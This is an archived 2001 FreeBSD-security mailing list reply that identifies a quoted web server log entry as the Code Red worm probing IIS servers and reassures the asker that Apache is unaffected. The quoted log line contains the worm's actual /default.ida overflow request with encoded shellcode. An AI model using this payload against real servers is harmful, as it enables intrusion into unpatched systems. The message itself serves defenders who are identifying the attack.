Date: Sat, 21 Jul 2001 14:17:36 -0700 From: Sean Chittenden <sean-freebsd-security@chittenden.org> To: nathan@salvation.unixgeeks.com Cc: freebsd-security@freebsd.org Subject: Re: possible? Message-ID: <20010721141736.V5160@rand.tgd.net> In-Reply-To: <20010721204942.12010.qmail@salvation.unixgeeks.com>; from "nathan@salvation.unixgeeks.com" on Sat, Jul 21, 2001 at = 08:49:42PM References: <20010721204942.12010.qmail@salvation.unixgeeks.com>
next in thread | previous in thread | raw e-mail | index | archive | help
[-- Attachment #1 --] > 195.10.116.2 - - [19/Jul/2001:15:50:20 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u > 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 > 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 332 This is the "Code Red" worm that's been infecting MS IIS boxes. Check out securityfocus.com for more information regarding this. If you're using apache then this is a non-issue and is mearly a fun pasttime. "Oooh! An infected host... and another, and another... ad infinitum (or 219,000 at last count)." You can also get more information from the bugtraq and incidents security mailing lists which are hosted by securityfocus.com. -sc -- Sean Chittenden [-- Attachment #2 --] -----BEGIN PGP SIGNATURE----- Comment: Sean Chittenden <sean@chittenden.org> iEYEARECAAYFAjtZ8W8ACgkQn09c7x7d+q1msgCgsvwrf5RZmlUoEHqzZmvWSdbc eccAoMRT7svtZfFa/e/kGty7a07xiEDM =N4rv -----END PGP SIGNATURE-----
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010721141736.V5160>